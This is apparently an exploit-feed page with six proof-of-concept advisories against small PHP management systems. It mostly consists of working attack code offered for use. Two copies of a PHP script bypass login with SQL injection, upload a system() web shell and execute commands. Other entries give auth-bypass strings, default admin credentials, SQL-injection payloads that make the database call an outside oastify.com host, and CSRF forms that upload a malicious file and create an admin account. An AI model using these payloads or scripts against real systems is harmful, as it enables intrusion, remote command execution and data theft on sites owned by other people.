Latest exploits :: CodePwn

<pre><code>============================================================================================================================================= | # Title : Membership Management System version 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://codeastro.com/membership-management-system-in-php-with-source-code/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload inject php code contains a back door. [+] Line 20 Set your Target. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php [+] payload : <?php // Function to generate a random string of a given length function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') { return substr(str_shuffle(str_repeat($chars, ceil($size / strlen($chars)))), 1, $size); } // Generating a random web shell file $shellFile = randomGen() . ".php"; // Creating a payload for the login $payload = [ 'email' => "test@mail.com' or 0=0 #", // Adjust based on the target 'password' => 'a', 'login' => '' ]; $session = curl_init(); // Target base URL (change this to your target IP or domain) $urlBase = "http://127.0.0.1/Membership/"; // Login $url = $urlBase . "index.php"; echo "=== Executing SQL Injection ===\n"; // Set cURL options for the POST request curl_setopt($session, CURLOPT_URL, $url); curl_setopt($session, CURLOPT_POST, 1); curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload)); curl_setopt($session, CURLOPT_RETURNTRANSFER, true); curl_setopt($session, CURLOPT_HEADER, true); // Include header in output curl_setopt($session, CURLOPT_FOLLOWLOCATION, false); curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging // Execute the login request $response = curl_exec($session); // Separate headers from body $header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE); $headers = substr($response, 0, $header_size); $body = substr($response, $header_size); // Check if 'Set-Cookie' header is present in the headers preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches); $cookie = ''; if (isset($matches[1][0])) { $cookie = $matches[1][0]; } // Print headers for debugging echo "=== Response Headers ===\n"; echo $headers; if ($cookie) { echo "=== Authenticated admin cookie: " . $cookie . " ===\n"; } else { echo "Set-Cookie header not found in the response.\n"; exit(); } // Prepare to upload shell $url = $urlBase . "settings.php"; // Get user input for the command to execute echo "Enter the command to execute: "; $cmd_input = trim(fgets(STDIN)); // PHP code to execute the command received from the user $php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>"; // Prepare the multipart/form-data $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16)); $body = "--$boundary\r\n"; $body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n"; $body .= "Membership System\r\n"; $body .= "--$boundary\r\n"; $body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n"; $body .= "$\r\n"; $body .= "--$boundary\r\n"; $body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n"; $body .= 'Content-Type: application/x-php' . "\r\n\r\n"; $body .= $php_code . "\r\n"; $body .= "--$boundary\r\n"; $body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n"; $body .= "\r\n"; $body .= "--$boundary--\r\n"; // Set cURL options for file upload curl_setopt($session, CURLOPT_URL, $url); curl_setopt($session, CURLOPT_POST, 1); curl_setopt($session, CURLOPT_POSTFIELDS, $body); curl_setopt($session, CURLOPT_HTTPHEADER, [ 'Content-Type: multipart/form-data; boundary=' . $boundary, 'Cookie: ' . $cookie ]); echo "=== Logging in and uploading shell " . $shellFile . " ===\n"; // Execute the upload request $response = curl_exec($session); // Close cURL session curl_close($session); // Curl the shell for testing $requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input); echo "=== Issuing the command: " . $requestUrl . " ===\n"; echo "=== CURL OUTPUT ===\n"; echo file_get_contents($requestUrl); ?> [+] Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>============================================================================================================================================= | # Title : Live Membership Management System version 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://www.kashipara.com/project/php/12997/live-membership-system-in-php-php-project-source-code | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This payload inject php code contains a back door. [+] Line 20 Set your Target. [+] save payload as poc.php [+] usage from cmd : C:\www\test>php 1.php [+] payload : <?php // Function to generate a random string of a given length function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') { return substr(str_shuffle(str_repeat($chars, ceil($size / strlen($chars)))), 1, $size); } // Generating a random web shell file $shellFile = randomGen() . ".php"; // Creating a payload for the login $payload = [ 'email' => "test@mail.com' or 0=0 #", // Adjust based on the target 'password' => 'a', 'login' => '' ]; $session = curl_init(); // Target base URL (change this to your target IP or domain) $urlBase = "http://127.0.0.1/Membership/"; // Login $url = $urlBase . "index.php"; echo "=== Executing SQL Injection ===\n"; // Set cURL options for the POST request curl_setopt($session, CURLOPT_URL, $url); curl_setopt($session, CURLOPT_POST, 1); curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload)); curl_setopt($session, CURLOPT_RETURNTRANSFER, true); curl_setopt($session, CURLOPT_HEADER, true); // Include header in output curl_setopt($session, CURLOPT_FOLLOWLOCATION, false); curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging // Execute the login request $response = curl_exec($session); // Separate headers from body $header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE); $headers = substr($response, 0, $header_size); $body = substr($response, $header_size); // Check if 'Set-Cookie' header is present in the headers preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches); $cookie = ''; if (isset($matches[1][0])) { $cookie = $matches[1][0]; } // Print headers for debugging echo "=== Response Headers ===\n"; echo $headers; if ($cookie) { echo "=== Authenticated admin cookie: " . $cookie . " ===\n"; } else { echo "Set-Cookie header not found in the response.\n"; exit(); } // Prepare to upload shell $url = $urlBase . "settings.php"; // Get user input for the command to execute echo "Enter the command to execute: "; $cmd_input = trim(fgets(STDIN)); // PHP code to execute the command received from the user $php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>"; // Prepare the multipart/form-data $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16)); $body = "--$boundary\r\n"; $body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n"; $body .= "Membership System\r\n"; $body .= "--$boundary\r\n"; $body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n"; $body .= "$\r\n"; $body .= "--$boundary\r\n"; $body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n"; $body .= 'Content-Type: application/x-php' . "\r\n\r\n"; $body .= $php_code . "\r\n"; $body .= "--$boundary\r\n"; $body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n"; $body .= "\r\n"; $body .= "--$boundary--\r\n"; // Set cURL options for file upload curl_setopt($session, CURLOPT_URL, $url); curl_setopt($session, CURLOPT_POST, 1); curl_setopt($session, CURLOPT_POSTFIELDS, $body); curl_setopt($session, CURLOPT_HTTPHEADER, [ 'Content-Type: multipart/form-data; boundary=' . $boundary, 'Cookie: ' . $cookie ]); echo "=== Logging in and uploading shell " . $shellFile . " ===\n"; // Execute the upload request $response = curl_exec($session); // Close cURL session curl_close($session); // Curl the shell for testing $requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input); echo "=== Issuing the command: " . $requestUrl . " ===\n"; echo "=== CURL OUTPUT ===\n"; echo file_get_contents($requestUrl); ?> [+] Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Beauty Parlour & Saloon Management System 1.1 Auth By PAss Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : u&p = ' or 0=0 ## [+] http://127.0.0.1/studentms/admin/login.php Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : Auto/Taxi Stand Management System 1.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : Username: admin Password: Test@123 [+] http://127.0.0.1/blms/banker/dashboard.php Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>## Titles: SFTRS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi ### Bonus: FU + RCE & XSS - Information disclosure ## Author: nu11secur1ty ## Date: 09/14/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `password` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\ wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all the information from the database of this system, and he can do very malicious action against the owner of this application! STATUS: HIGH- Vulnerability for deprecation! WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR! https://github.com/oretnom23 [+]Exploits: - SQLi Multiple: ```mysql --- Parameter: password (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\ wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT 9033=9033 AND ('ehPW'='ehPW Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\ wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT 4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\ wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT 1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw --- ``` ## Reproduce: [href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018) ## Proof and Exploit: [href]( https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html ) ## Time spent: 00:17:00 </code></pre>

<pre><code>============================================================================================================================================= | # Title : Reservation Management System 1.0 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code uploads a executable malicious file remotely . [+] Line 8 : Set your target url [+] save payload as poc.html [+] payload : <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h4 class="modal-title">Add New Menu</h4> </div> <div class="modal-body">  <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">  <div class="form-group"> <label class="control-label col-lg-2" for="title">Menu Name</label> <div class="col-lg-8"> <input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required=""> </div> </div>  <div class="form-group"> <label class="control-label col-lg-2" for="title">Category</label> <div class="col-lg-8"> <select class="form-control select2" id="exampleSelect1" name="cat" required=""> <option value="9">Dessert</option> <option value="6">Main Course</option> <option value="7">Pasta</option> <option value="10">Rice</option> </select> </div> </div>  <div class="form-group"> <label class="control-label col-lg-2" for="title">Subcategory</label> <div class="col-lg-8"> <select class="form-control select2" id="exampleSelect1" name="subcat"> <option>Drinks</option> <option>Lunch and Dinner</option> <option>Mirienda</option> <option>Non Combo Meal</option> </select> </div> </div>  <div class="form-group"> <label class="control-label col-lg-2" for="title">Description</label> <div class="col-lg-8"> <textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea> </div> </div>  <div class="form-group"> <label class="control-label col-lg-2" for="title">Price</label> <div class="col-lg-8"> <input type="text" class="form-control" name="price" id="title" placeholder="Price" required=""> </div> </div>  <div class="form-group"> <label class="control-label col-lg-2" for="title">Image</label> <div class="col-lg-8"> <input type="file" class="form-control" name="image" id="title"> </div> </div>  <div class="form-group">  <div class="col-lg-offset-2 col-lg-6"> <button type="submit" class="btn btn-sm btn-primary">Save</button> <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button> </div> </div> </form>  </div> </div> [+] Ev!L : http://127.0.0.1/reservation/images/shopping.php -----------[+] Part 02 Add Admin [+]------------------- [+] Line 8 : Set your target url [+] save payload as poc.html [+] payload : <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h4 class="modal-title">Add New User</h4> </div> <div class="modal-body">  <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">  <div class="form-group"> <label class="control-label col-lg-2" for="title">Full Name</label> <div class="col-lg-8"> <input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required=""> </div> </div>  <div class="form-group"> <label class="control-label col-lg-2" for="username">Username</label> <div class="col-lg-8"> <input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required=""> </div> </div>  <div class="form-group"> <label class="control-label col-lg-2" for="password">Password</label> <div class="col-lg-8"> <input type="password" class="form-control" name="password" id="password" placeholder="Write password" required=""> </div> </div>  <div class="form-group">  <div class="col-lg-offset-2 col-lg-6"> <button type="submit" class="btn btn-sm btn-primary">Save</button> <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button> </div> </div> </form>  </div> </div> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>